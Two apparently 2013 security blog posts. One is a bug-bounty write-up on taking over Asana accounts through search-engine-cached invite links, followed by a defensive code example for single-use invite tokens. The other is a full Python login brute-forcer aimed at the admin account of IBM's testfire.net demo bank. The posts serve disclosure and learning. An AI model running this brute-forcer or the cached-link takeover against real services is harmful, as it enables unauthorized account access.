Wednesday, October 9, 2013

Hijack User accounts via cached Invite links! #Asana #bugbounty

A few weeks back a friend of mine mentioned Asana's bug bounty program to me. Although I did not see any mention of reward money on their security page, I still thought of giving it a try. After reading a little about the company I found that www.asana.com is a portal where a team can share resources and organize its work, i.e. a kind of project management software.
I created an account and started poking around, checking for obvious vulnerabilities such as XSS and CSRF. The application appeared to be decent, but there was always some scope for a few logical vulnerabilities.
The application allowed creation of new projects, followed by addition of new users by sending them invite links.
These invite links looked like this (https://app.asana.com/app/asana/-/register?invite=XXXXXX), so I thought of trying my luck with them.

By using a few Google dorks I was able to get a list of invite links which had been cached by Google and, to my surprise, they were still active.
So I collected a list of cached invite links and tried creating an account and voila!! It worked smoothly, as I expected. I was able to log in to a valid user account by creating a new password.

I reported this issue to Asana's security team and they were very quick in responding to my emails. The issue got fixed in no time and they rewarded me for it.
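To show the lifecycle that stops a cached invite link from being reused the way this post describes, here is an added example (my own illustration, not Asana's code or anything from the report): tokens are random, stored only as a hash, expire, and are burned on first redemption, so a copy scraped from a search cache later is rejected. The class, field names and sample addresses are hypothetical.

```python
import hashlib
import secrets
import time

class InviteStore:
    """Hypothetical single-use, expiring invite store (added example, not Asana's code)."""

    def __init__(self, ttl_seconds=7 * 24 * 3600, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock          # injectable so expiry can be exercised in tests
        # digest -> record: only a hash of the token is kept, so a leaked table
        # does not hand out working ?invite= values
        self._invites = {}

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def create(self, email):
        token = secrets.token_urlsafe(32)   # 256 bits; not guessable or enumerable
        self._invites[self._digest(token)] = {
            "email": email, "expires": self.clock() + self.ttl, "used": False}
        return token                        # the value placed after register?invite=

    def redeem(self, token):
        """Return the invited address if the link is live, else None; burns the token."""
        rec = self._invites.get(self._digest(token))
        if rec is None or rec["used"] or self.clock() > rec["expires"]:
            return None
        rec["used"] = True                  # a copy found in a cache later is now dead
        return rec["email"]

    def revoke_for(self, email):
        """Kill every outstanding invite for an address, e.g. once the account exists."""
        for rec in self._invites.values():
            if rec["email"] == email:
                rec["used"] = True

def demo():
    """Constructed scenario: legitimate use, a cached replay, and an unused stale link."""
    now = [1_000_000.0]
    store = InviteStore(ttl_seconds=3600, clock=lambda: now[0])
    token = store.create("alice@example.com")      # constructed sample address
    first = store.redeem(token)                    # invitee signs up -> address returned
    replay = store.redeem(token)                   # same link scraped from a cache -> None
    stale = store.create("bob@example.com")
    now[0] += 3601                                 # more than the one-hour TTL passes
    expired = store.redeem(stale)                  # never used, but too old -> None
    return first, replay, expired
```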

Tuesday, October 1, 2013

My lazy attempt towards python! #BeautifulSoup #Requests

Inspired by the amazing null humla session that I attended, I thought of writing my own simple login brute-forcer in Python using Requests. There are a lot of brute-forcing scripts on the market, but I thought of writing my own.
I love the Requests library for Python; as the author says, "It's HTTP for Humans", and it actually is. I really encourage using this library at least once if one wants to start learning Python web scraping.
I have also used the BeautifulSoup library to extract a few HTML tags. The website which I have used is http://www.testfire.net, which is a vulnerable bank application developed by IBM for web app testing.
The script is used to brute force all possible passwords against a single user name "admin". I initially tried writing it with cookiejar but somehow the code got a little lengthier; then Requests came to my rescue.
The script opens a file called 'password.txt' containing a list of random passwords to brute force. In this case the correct password is "admin". With the Requests library it is possible to intercept the request in a proxy before it hits the server; here I am running a proxy on port 8082 just to see what data my script is sending. Feel free to use the script (for learning purposes only), here is the gist link.

#Author: Prajal Kulkarni
import requests
import sys
from bs4 import BeautifulSoup as BS

# Route traffic through a local intercepting proxy so each request can be inspected
proxyDict = {"http": "127.0.0.1:8082"}

url = "http://www.testfire.net/bank/login.aspx"

def connect(url, m):
    # POST the login form; a successful login renders the "MY ACCOUNT" link
    t = requests.post(url, data=m, proxies=proxyDict)
    print(t.text)
    soup = BS(t.text, "html.parser")
    a = soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
    # On a failed login the link is absent, so guard against None before reading it
    x = str(a.string) if a is not None else ""
    print(x)
    if x == "MY ACCOUNT":
        print("The pass is" + " " + m['passw'])
        sys.exit()
    else:
        print("Password %s not working" % m['passw'])

def controller():
    m = {}
    # One candidate password per line; skip blank lines left by a trailing newline
    with open('password.txt', 'r') as fh:
        f = [line for line in fh.read().splitlines() if line]
    for line in f:
        m["uid"] = "admin"
        m["passw"] = str(line)
        m["btnSubmit"] = "Login"
        print(m)
        connect(url, m)

controller()